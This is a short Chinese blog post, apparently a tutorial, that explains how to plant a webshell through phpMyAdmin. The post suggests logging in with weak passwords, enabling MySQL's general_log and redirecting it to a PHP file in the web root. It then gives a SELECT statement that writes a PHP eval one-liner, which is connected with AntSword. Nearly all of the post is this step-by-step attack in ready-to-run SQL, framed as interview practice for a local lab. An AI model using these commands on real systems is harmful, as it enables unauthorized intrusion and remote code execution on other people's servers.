Phpmyadmin写日志getshell

这个算是一个很常见也很基础的getshell的方式,昨天有个小伙伴问到我这个问题,说面试的时候主管给了他一个phpmyadmin登录入口,让他getshell,由于实战经验较少,小伙伴那道题没拿到分。其实,看到phpmyadmin,第一反应就应该是写日志getshell。为了防止大家继续踩坑,特地科普一波。

大家看了以后记得在本地phpstudy环境内动手测试一下,以免后面再遇到这类面试题不知道怎么处理。


前提:mysql>5.0版本,进入phpmyadmin后台(一般都是弱口令进去)。

1.在知道网站绝对路径的情况下,直接去第二步,如果不知道网站绝对路径的情况下

#查看数据库存放路径

select @@datadir;

然后根据数据库存放路径猜测网站的绝对路径。

2.查看日志是否开启

show variables like '%general%';

一般这个日志记录是默认关闭的,需要我们手动开启

3.开启日志记录

SET GLOBAL general_log='on';

4.修改日志路径

set global general_log_file='D:\\phpStudy\\WWW\\shell.php';

#这里一定要用\\,或者使用/,不能使用\。

5.写入shell

select "<?php eval($_POST['gg']);?>";

6.这样就可以用蚁剑连接我们的shell了。

为您推荐

发表评论

电子邮件地址不会被公开。 必填项已用*标注